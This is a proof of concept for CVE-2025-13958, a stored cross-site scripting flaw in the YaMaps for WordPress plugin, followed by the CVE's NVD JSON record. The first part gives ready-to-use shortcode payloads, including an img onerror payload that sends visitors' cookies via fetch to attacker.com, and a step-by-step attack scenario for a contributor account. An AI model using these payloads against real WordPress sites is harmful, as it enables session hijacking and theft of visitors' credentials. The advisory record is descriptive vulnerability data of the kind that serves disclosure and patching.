CVE-2025-13958

<!-- PoC for CVE-2025-13958: YaMaps for WordPress Plugin Stored XSS --> <!-- Attacker with contributor role can inject malicious JavaScript via shortcode attributes --> <!-- Basic PoC using script tag --> [yamap id="test" address="<script>alert(document.cookie)</script>" zoom="15"] <!-- PoC using event handler attribute --> [yamap id="test" address="Test Location" zoom="15" onmouseover="alert('XSS Triggered')"] <!-- PoC using img tag with onerror --> [yamap id="test" address="<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>"] <!-- Real-world attack scenario --> <!-- 1. Attacker creates/edits a post with contributor account --> <!-- 2. Insert malicious shortcode with XSS payload --> <!-- 3. Submit and publish the post --> <!-- 4. When any user views the page, the XSS payload executes -->

{"cve": {"id": "CVE-2025-13958", "sourceIdentifier": "[email protected]", "published": "2025-12-29T06:15:51.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YaMaps for WordPress Plugin WordPress plugin before 0.6.40 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/0d4bb338-f0d0-4b57-8664-1b8cba7cbe52/", "source": "[email protected]"}]}}